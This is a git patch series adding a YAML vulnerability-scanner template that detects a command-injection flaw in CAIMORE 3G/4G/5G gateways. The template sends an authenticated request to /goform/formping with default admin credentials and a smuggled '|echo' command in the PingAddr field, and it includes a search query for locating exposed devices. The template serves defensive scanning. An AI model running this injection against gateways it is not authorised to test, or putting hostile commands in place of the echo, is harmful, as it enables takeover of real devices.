From 4812b16559da5fdbec5ab37fb882778b89772142 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 18 Aug 2023 00:05:57 +0530 Subject: [PATCH 1/3] Add files via upload --- .../other/caimore-gateway-rce.yaml | 50 +++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 http/vulnerabilities/other/caimore-gateway-rce.yaml diff --git a/http/vulnerabilities/other/caimore-gateway-rce.yaml b/http/vulnerabilities/other/caimore-gateway-rce.yaml new file mode 100644 index 0000000000..24a6bfd9ff --- /dev/null +++ b/http/vulnerabilities/other/caimore-gateway-rce.yaml @@ -0,0 +1,50 @@ +id: caimore-gateway-rce + +info: + name: CAIMORE Gateway - Remote Code Execution + author: momika233 + severity: high + description: | + The gateway of Xiamen Caimao Communication Technology Co., Ltd. is designed with open software architecture. It is a metal shell design, with two Ethernet RJ45 interfaces, and an industrial design wireless gateway using 3G/4G/5G wide area network for Internet communication. There is a command execution vulnerability in the formping file of the gateway of Xiamen Caimao Communication Technology Co., Ltd. An attacker can use this vulnerability to arbitrarily execute code on the server side, write to the back door, obtain server permissions, and then control the entire web server. + reference: + - https://www.ctfiot.com/126482.html + metadata: + max-request: 2 + verified: true + fofa-query: app="CAIMORE-Gateway" + tags: ciamore-gateway,rce,authenticated,intrusive + +http: + - raw: + - | + POST /goform/formping HTTP/1.1 + Host: {{Hostname}} + Connection: closeContent-Length: 63 + Authorization: Basic {{base64(username + ':' + password)}} + Accept-Encoding: gzip + + PingAddr=127.0.0.1%7Cecho%20{{randstr}}&PingPackNumb=1&PingMsg= + + - | + GET /pingmessages HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + Accept-Encoding: gzip + + attack: pitchfork + payloads: + username: + - admin + password: + - admin + + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - "{{randstr}}" + + - type: status + status: + - 200 \ No newline at end of file From 38a717c0642d4e3985c3c16acdb319c9fd99c87b Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 18 Aug 2023 11:01:18 +0530 Subject: [PATCH 2/3] Update caimore-gateway-rce.yaml --- http/vulnerabilities/other/caimore-gateway-rce.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/vulnerabilities/other/caimore-gateway-rce.yaml b/http/vulnerabilities/other/caimore-gateway-rce.yaml index 24a6bfd9ff..6cc9047177 100644 --- a/http/vulnerabilities/other/caimore-gateway-rce.yaml +++ b/http/vulnerabilities/other/caimore-gateway-rce.yaml @@ -19,7 +19,6 @@ http: - | POST /goform/formping HTTP/1.1 Host: {{Hostname}} - Connection: closeContent-Length: 63 Authorization: Basic {{base64(username + ':' + password)}} Accept-Encoding: gzip @@ -47,4 +46,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 From b906322c1e6458c2dc0b3b435caa6182f7981f4d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 18 Aug 2023 13:27:12 +0530 Subject: [PATCH 3/3] remove verified --- http/vulnerabilities/other/caimore-gateway-rce.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/http/vulnerabilities/other/caimore-gateway-rce.yaml b/http/vulnerabilities/other/caimore-gateway-rce.yaml index 6cc9047177..1c34cb5367 100644 --- a/http/vulnerabilities/other/caimore-gateway-rce.yaml +++ b/http/vulnerabilities/other/caimore-gateway-rce.yaml @@ -10,7 +10,6 @@ info: - https://www.ctfiot.com/126482.html metadata: max-request: 2 - verified: true fofa-query: app="CAIMORE-Gateway" tags: ciamore-gateway,rce,authenticated,intrusive